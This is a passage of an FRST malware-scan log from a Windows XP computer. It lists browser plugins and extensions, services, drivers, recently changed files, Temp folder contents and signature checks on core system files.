FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctxlogging.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctxmui.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\icafile.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\icalogon.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npicaN.dll [2010-05-12] ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npMozCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2013-05-08] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll [2015-02-12] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll [2015-02-12] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll [2015-02-12] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll [2015-02-12] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll [2015-02-12] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin6.dll [2012-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin7.dll [2012-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\sslsdk_b.dll [2010-04-14] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\TcpPServ.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Documents and Settings\Geny\Application Data\mozilla\plugins\npgoogletalk.dll [2014-10-03] (Google)
FF Plugin ProgramFiles/Appdata: C:\Documents and Settings\Geny\Application Data\mozilla\plugins\npo1d.dll [2014-10-03] (Google)
FF Extension: Garmin Communicator - C:\Documents and Settings\Geny\Application Data\Mozilla\Firefox\Profiles\59nmg3h4.default\Extensions\{195A3098-0BD5-4e90-AE22-BA1C540AFD1E} [2015-05-30]
FF Extension: Microsoft .NET Framework Assistant - C:\Documents and Settings\Geny\Application Data\Mozilla\Firefox\Profiles\59nmg3h4.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-05-29] [not signed]
FF Extension: Zynga - C:\Documents and Settings\Geny\Application Data\Mozilla\Firefox\Profiles\59nmg3h4.default\Extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822} [2015-07-15] [not signed]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2010-03-30] [not signed]
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\itms.js [2014-10-08]
Chrome:
=======
CHR StartupUrls: Default -> "hxxps://www.lds.org/?lang=eng"
CHR Profile: C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-05-02]
CHR Extension: (Google Docs) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-05-02]
CHR Extension: (Google Drive) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-26]
CHR Extension: (YouTube) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-29]
CHR Extension: (Google Sheets) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-05-02]
CHR Extension: (Google Docs Offline) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-12]
CHR Extension: (Chrome Web Store Payments) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-20]
CHR Extension: (Gmail) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-05-02]
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 Adobe Version Cue CS4; C:\Program Files\Common Files\Adobe\Adobe Version Cue CS4\Server\bin\VersionCueCS4.exe [288112 2010-03-31] (Adobe Systems Incorporated)
S3 AvgAMPS; C:\Program Files\AVG\Av\avgamps.exe [595376 2015-10-30] (AVG Technologies CZ, s.r.o.)
R2 AVGIDSAgent; C:\Program Files\AVG\Av\avgidsagent.exe [3815648 2015-10-30] (AVG Technologies CZ, s.r.o.)
R2 avgsvc; C:\Program Files\AVG\Framework\Common\avgsvcx.exe [862632 2015-10-16] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\Av\avgwdsvcx.exe [579776 2015-10-30] (AVG Technologies CZ, s.r.o.)
R2 Fitbit Connect; C:\Program Files\Fitbit Connect\FitbitConnectService.exe [1435680 2014-01-10] (Fitbit, Inc.) [File not signed]
S2 HPSupportSolutionsFrameworkService; C:\Program Files\Hp\Common\HPSupportSolutionsFrameworkService.exe [89840 2015-03-28] (Hewlett-Packard Company)
R2 Net Driver HPZ12; C:\WINDOWS\system32\HPZinw12.dll [44032 2009-05-14] (Hewlett-Packard) [File not signed]
R2 PLFlash DeviceIoControl Service; C:\WINDOWS\system32\IoctlSvc.exe [81920 2006-12-19] (Prolific Technology Inc.) [File not signed]
R2 Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.dll [53760 2009-05-14] (Hewlett-Packard) [File not signed]
R2 wltrysvc; C:\WINDOWS\System32\bcmwltry.exe [2232320 2010-03-30] (Dell Inc.) [File not signed]
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R1 Avgdiskx; C:\WINDOWS\System32\DRIVERS\avgdiskx.sys [156080 2015-08-10] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriverl; C:\WINDOWS\System32\DRIVERS\avgidsdriverlx.sys [243632 2015-10-19] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\WINDOWS\System32\DRIVERS\avgidshx.sys [231344 2015-08-20] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\WINDOWS\System32\DRIVERS\avgidsshimx.sys [31664 2015-08-14] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\WINDOWS\System32\DRIVERS\avgldx86.sys [229296 2015-10-21] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\WINDOWS\System32\DRIVERS\avglogx.sys [308656 2015-08-14] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\WINDOWS\System32\DRIVERS\avgmfx86.sys [192944 2015-10-21] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\WINDOWS\System32\DRIVERS\avgrkx86.sys [36784 2015-08-10] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\WINDOWS\System32\DRIVERS\avgtdix.sys [231856 2015-10-08] (AVG Technologies CZ, s.r.o.)
S3 BCM43XX; C:\WINDOWS\System32\DRIVERS\bcmwl5.sys [2649216 2010-03-30] (Broadcom Corporation)
S3 CCDECODE; C:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-13] (Microsoft Corporation)
R2 fssfltr; C:\WINDOWS\System32\DRIVERS\fssfltr_tdi.sys [54752 2009-08-05] (Microsoft Corporation)
S3 HPZid412; C:\WINDOWS\System32\DRIVERS\HPZid412.sys [49920 2008-10-28] (HP)
S3 HPZipr12; C:\WINDOWS\System32\DRIVERS\HPZipr12.sys [16496 2008-10-28] (HP)
S3 HPZius12; C:\WINDOWS\System32\DRIVERS\HPZius12.sys [21568 2008-10-28] (HP)
R3 IntcAzAudAddService; C:\WINDOWS\System32\drivers\RtDHDAud.sys [5876224 2009-10-23] (Realtek Semiconductor Corp.)
R3 k57w2k; C:\WINDOWS\System32\DRIVERS\k57xp32.sys [209960 2009-05-31] (Broadcom Corporation)
R3 LEqdUsb; C:\WINDOWS\System32\Drivers\LEqdUsb.Sys [42264 2013-05-22] (Logitech, Inc.)
R3 LHidEqd; C:\WINDOWS\System32\Drivers\LHidEqd.Sys [10136 2013-05-22] (Logitech, Inc.)
S3 libusb0; C:\WINDOWS\System32\DRIVERS\libusb0.sys [42592 2013-08-30] (hxxp://libusb-win32.sourceforge.net)
S3 LVUSBSta; C:\WINDOWS\System32\DRIVERS\LVUSBSta.sys [41888 2007-05-11] (Logitech Inc.)
S3 NdisIP; C:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-13] (Microsoft Corporation)
S3 NuidFltr; C:\WINDOWS\System32\DRIVERS\NuidFltr.sys [14736 2009-05-09] (Microsoft Corporation)
S0 cerc6; no ImagePath
S4 IntelIde; no ImagePath
U1 WS2IFSL; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-11-14 20:31 - 2015-11-14 20:32 - 00000000 ____D C:\FRST
2015-11-14 14:55 - 2015-11-14 14:56 - 00000000 ___HD C:\bb64b446
2015-11-11 11:51 - 2015-11-14 20:32 - 00000664 _____ C:\Documents and Settings\Geny\Local Settings\Application Data\d3d9caps.dat
2015-11-04 19:16 - 2015-11-06 18:36 - 00000000 ____D C:\Program Files\Mozilla Firefox
2015-11-03 06:47 - 2015-11-03 06:47 - 00000000 ____D C:\Documents and Settings\Geny\Application Data\AVG
2015-11-03 06:45 - 2015-11-03 06:45 - 00000673 _____ C:\Documents and Settings\All Users\Desktop\AVG Protection.lnk
2015-11-03 06:40 - 2015-11-03 06:43 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\Avg
2015-11-03 06:39 - 2015-11-03 06:40 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Application Data\AvgSetupLog
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-11-14 20:33 - 2010-03-30 13:51 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Temp
2015-11-14 20:32 - 2010-08-29 06:33 - 00000974 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1454471165-790525478-1801674531-1003UA.job
2015-11-14 20:24 - 2012-07-26 18:32 - 00000000 ____D C:\Documents and Settings\Geny\Application Data\uTorrent
2015-11-14 20:20 - 2010-03-30 13:46 - 01585423 _____ C:\WINDOWS\WindowsUpdate.log
2015-11-14 20:16 - 2010-03-30 06:32 - 00607774 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-11-14 20:12 - 2010-11-07 08:24 - 00000882 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-11-14 20:12 - 2010-03-30 06:34 - 00000159 _____ C:\WINDOWS\wiadebug.log
2015-11-14 20:12 - 2010-03-30 06:34 - 00000050 _____ C:\WINDOWS\wiaservc.log
2015-11-14 20:11 - 2014-04-09 02:24 - 00000220 _____ C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Logon.job
2015-11-14 20:11 - 2010-03-30 13:50 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-11-14 19:56 - 2012-07-26 18:27 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\MFAData
2015-11-14 19:53 - 2010-11-07 08:24 - 00000886 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-11-14 18:51 - 2010-03-30 15:12 - 00393216 _____ C:\WINDOWS\system32\config\WindowsPowerShell.evt
2015-11-14 11:53 - 2010-03-30 13:50 - 00032476 _____ C:\WINDOWS\SchedLgU.Txt
2015-11-14 07:51 - 2008-04-14 05:00 - 00002206 _____ C:\WINDOWS\system32\wpa.dbl
2015-11-12 22:03 - 2010-03-30 13:51 - 00000178 ___SH C:\Documents and Settings\Geny\ntuser.ini
2015-11-12 06:32 - 2010-08-29 06:33 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1454471165-790525478-1801674531-1003Core.job
2015-11-11 14:38 - 2015-06-02 07:46 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Application Data\Avg
2015-11-11 12:56 - 2015-05-02 06:29 - 00001813 _____ C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk
2015-11-11 10:59 - 2015-09-24 11:16 - 00000000 ___HD C:\Documents and Settings\All Users\Application Data\{42793930-2684-4C15-9B87-9CEF8846A875}
2015-11-11 10:35 - 2010-04-06 19:30 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Application Data\Apple
2015-11-09 08:06 - 2010-03-30 13:51 - 00000000 ____D C:\Documents and Settings\Geny
2015-11-08 15:00 - 2014-04-09 02:24 - 00000214 _____ C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Monthly.job
2015-11-08 03:15 - 2012-05-05 10:23 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
2015-11-03 06:47 - 2012-07-26 18:55 - 00000000 ____D C:\Program Files\AVG
2015-11-03 06:46 - 2014-03-31 08:20 - 00000000 ____D C:\Documents and Settings\All Users\Start Menu\Programs\AVG
2015-11-03 06:45 - 2013-10-10 02:09 - 00219030 _____ C:\WINDOWS\setupapi.log
2015-10-29 17:40 - 2010-04-18 18:49 - 00148992 _____ C:\Documents and Settings\Geny\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-10-29 17:40 - 2010-04-17 16:41 - 00000069 _____ C:\WINDOWS\NeroDigital.ini
2015-10-28 16:15 - 2012-06-30 19:27 - 00780488 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2015-10-28 16:15 - 2011-06-03 19:23 - 00142536 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2015-10-28 16:15 - 2010-03-31 09:20 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Application Data\Adobe
2015-10-21 16:24 - 2011-10-07 05:23 - 00229296 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgldx86.sys
2015-10-21 16:14 - 2011-08-08 05:08 - 00192944 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgmfx86.sys
2015-10-19 08:06 - 2014-06-17 15:17 - 00243632 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgidsdriverlx.sys
==================== Files in the root of some directories =======
2015-11-11 11:51 - 2015-11-14 20:32 - 0000664 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\d3d9caps.dat
2010-04-18 18:49 - 2015-10-29 17:40 - 0148992 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2012-11-11 08:07 - 2012-11-11 08:07 - 0027520 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\dt.dat
2011-01-04 14:30 - 2011-01-06 10:26 - 0001940 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\{96C87F53-AC72-4604-A9CC-186A49F17F3C}.ini
Some files in TEMP:
====================
C:\Documents and Settings\Geny\Local Settings\Temp\11.exe
C:\Documents and Settings\Geny\Local Settings\Temp\avg-03e82148-59f7-4537-a3dc-287390295d3f.exe
C:\Documents and Settings\Geny\Local Settings\Temp\difxapi.dll
C:\Documents and Settings\Geny\Local Settings\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmprowbg4.dll
C:\Documents and Settings\Geny\Local Settings\Temp\en_ww_Package.exe
C:\Documents and Settings\Geny\Local Settings\Temp\FP_AX_MSI_INSTALLER.exe
C:\Documents and Settings\Geny\Local Settings\Temp\FP_PL_MSI_INSTALLER.exe
C:\Documents and Settings\Geny\Local Settings\Temp\GLF1B.tmp.tbZyng.dll
C:\Documents and Settings\Geny\Local Settings\Temp\hpzmsi01.exe
C:\Documents and Settings\Geny\Local Settings\Temp\hpzscr01.exe
C:\Documents and Settings\Geny\Local Settings\Temp\install_reader10_en_air_gtbp_mssa_aih[1].exe
C:\Documents and Settings\Geny\Local Settings\Temp\ose00000.exe
C:\Documents and Settings\Geny\Local Settings\Temp\TB_441.exe
C:\Documents and Settings\Geny\Local Settings\Temp\UNINSTALL.EXE
C:\Documents and Settings\Geny\Local Settings\Temp\utt8CF.tmp.exe
C:\Documents and Settings\Geny\Local Settings\Temp\Zynga.exe
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
==================== End of FRST.txt ============================